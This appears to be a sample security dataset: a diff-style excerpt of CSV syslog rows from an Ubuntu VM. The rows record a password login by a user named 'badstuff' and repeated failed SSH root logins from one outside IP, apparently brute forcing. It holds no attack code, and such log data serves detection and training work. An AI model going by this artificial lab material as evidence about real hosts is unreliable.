+7460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:57,UbuntuDevEnv,2019-06-11 00:27:56,auth,UbuntuDevEnv,info,Removed session 268.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:45,UbuntuDevEnv,2019-06-11 00:30:45,auth,UbuntuDevEnv,info,Accepted password for badstuff from 40.122.150.115 port 51980 ssh2,49062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,40.122.150.1,51980,,
+7462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:45,UbuntuDevEnv,2019-06-11 00:30:45,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user badstuff by (uid=0),49062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:45,UbuntuDevEnv,2019-06-11 00:30:45,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user badstuff by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:45,UbuntuDevEnv,2019-06-11 00:30:45,auth,UbuntuDevEnv,info,New session 276 of user badstuff.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:49,UbuntuDevEnv,2019-06-11 00:30:48,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user badstuff,49062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:49,UbuntuDevEnv,2019-06-11 00:30:48,auth,UbuntuDevEnv,info,Removed session 276.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:49,UbuntuDevEnv,2019-06-11 00:30:48,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session closed for user badstuff,,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:54,UbuntuDevEnv,2019-06-11 00:30:53,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,45660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:54,UbuntuDevEnv,2019-06-11 00:30:53,auth,UbuntuDevEnv,info,Removed session 262.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:54,UbuntuDevEnv,2019-06-11 00:30:54,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,45671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:30:54,UbuntuDevEnv,2019-06-11 00:30:54,auth,UbuntuDevEnv,info,Removed session 264.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:42:58,UbuntuDevEnv,2019-06-11 00:42:58,auth,UbuntuDevEnv,info,Connection closed by 34.76.120.140 port 56194 [preauth],52061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,34.76.120.1,56194,,
+7473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 01:30:33,UbuntuDevEnv,2019-06-11 01:30:33,auth,UbuntuDevEnv,info,Did not receive identification string from 191.208.250.55 port 3467,62416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,191.208.250.5,3467,,
+7474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:11,UbuntuDevEnv,2019-06-11 02:43:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:13,UbuntuDevEnv,2019-06-11 02:43:13,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 13888 ssh2,78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,13888,,
+7476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:28,UbuntuDevEnv,2019-06-11 02:43:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:28,UbuntuDevEnv,2019-06-11 02:43:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 112.85.42.171 port 13888: Too many authentication failures [preauth],78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,13888,,
+7478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:28,UbuntuDevEnv,2019-06-11 02:43:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:28,UbuntuDevEnv,2019-06-11 02:43:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 112.85.42.171 port 13888 ssh2],78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,13888,,
+7480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:28,UbuntuDevEnv,2019-06-11 02:43:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 112.85.42.171 port 13888 ssh2 [preauth],78625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,13888,,
+7481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:31,UbuntuDevEnv,2019-06-11 02:43:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:32,UbuntuDevEnv,2019-06-11 02:43:32,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 29747 ssh2,78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,29747,,
+7483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:47,UbuntuDevEnv,2019-06-11 02:43:46,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 112.85.42.171 port 29747: Too many authentication failures [preauth],78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,29747,,
+7484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:47,UbuntuDevEnv,2019-06-11 02:43:46,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 112.85.42.171 port 29747 ssh2],78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,29747,,
+7485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:47,UbuntuDevEnv,2019-06-11 02:43:46,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:47,UbuntuDevEnv,2019-06-11 02:43:46,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:47,UbuntuDevEnv,2019-06-11 02:43:46,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 112.85.42.171 port 29747 ssh2 [preauth],78692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,29747,,
+7488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:50,UbuntuDevEnv,2019-06-11 02:43:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:43:51,UbuntuDevEnv,2019-06-11 02:43:51,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 43334 ssh2,78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,43334,,
+7490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:01,UbuntuDevEnv,2019-06-11 02:44:00,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 112.85.42.171 port 43334 ssh2],78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,43334,,
+7491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:03,UbuntuDevEnv,2019-06-11 02:44:02,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 43334 ssh2,78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,43334,,
+7492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:06,UbuntuDevEnv,2019-06-11 02:44:05,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 43334 ssh2,78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,43334,,
+7493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:06,UbuntuDevEnv,2019-06-11 02:44:05,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:06,UbuntuDevEnv,2019-06-11 02:44:05,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 112.85.42.171 port 43334: Too many authentication failures [preauth],78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,43334,,
+7495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:06,UbuntuDevEnv,2019-06-11 02:44:05,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:06,UbuntuDevEnv,2019-06-11 02:44:05,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 112.85.42.171 port 43334 ssh2 [preauth],78761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,43334,,
+7497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:09,UbuntuDevEnv,2019-06-11 02:44:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:11,UbuntuDevEnv,2019-06-11 02:44:10,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 57487 ssh2,78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,57487,,
+7499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:24,UbuntuDevEnv,2019-06-11 02:44:24,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 112.85.42.171 port 57487 ssh2],78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,57487,,
+7500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:24,UbuntuDevEnv,2019-06-11 02:44:24,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 112.85.42.171 port 57487 ssh2 [preauth],78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,57487,,
+7501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:24,UbuntuDevEnv,2019-06-11 02:44:24,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:24,UbuntuDevEnv,2019-06-11 02:44:24,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 112.85.42.171 port 57487: Too many authentication failures [preauth],78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,57487,,
+7503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:24,UbuntuDevEnv,2019-06-11 02:44:24,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:27,UbuntuDevEnv,2019-06-11 02:44:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:30,UbuntuDevEnv,2019-06-11 02:44:29,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 6880 ssh2,78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,6880,,
+7506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:32,UbuntuDevEnv,2019-06-11 02:44:32,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 6880 ssh2,78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,6880,,
+7507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:44,UbuntuDevEnv,2019-06-11 02:44:44,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 112.85.42.171 port 6880: Too many authentication failures [preauth],78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,6880,,
+7508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:44,UbuntuDevEnv,2019-06-11 02:44:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:44,UbuntuDevEnv,2019-06-11 02:44:44,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 112.85.42.171 port 6880 ssh2],78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,6880,,
+7510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:44,UbuntuDevEnv,2019-06-11 02:44:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:44,UbuntuDevEnv,2019-06-11 02:44:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 112.85.42.171 port 6880 ssh2 [preauth],78897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,6880,,
+7512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:47,UbuntuDevEnv,2019-06-11 02:44:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:44:49,UbuntuDevEnv,2019-06-11 02:44:48,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 21383 ssh2,78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,21383,,
+7514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:45:01,UbuntuDevEnv,2019-06-11 02:44:59,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 112.85.42.171 port 21383 ssh2],78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,21383,,
+7515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:45:02,UbuntuDevEnv,2019-06-11 02:45:01,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:45:02,UbuntuDevEnv,2019-06-11 02:45:01,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 112.85.42.171 port 21383: Too many authentication failures [preauth],78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,21383,,
+7517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:45:02,UbuntuDevEnv,2019-06-11 02:45:01,auth,UbuntuDevEnv,info,Failed password for root from 112.85.42.171 port 21383 ssh2,78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,21383,,
+7518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:45:02,UbuntuDevEnv,2019-06-11 02:45:01,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.171  user=root,78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,112.85.42.1,,0,
+7519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 02:45:02,UbuntuDevEnv,2019-06-11 02:45:01,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 112.85.42.171 port 21383 ssh2 [preauth],78968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,112.85.42.1,21383,,
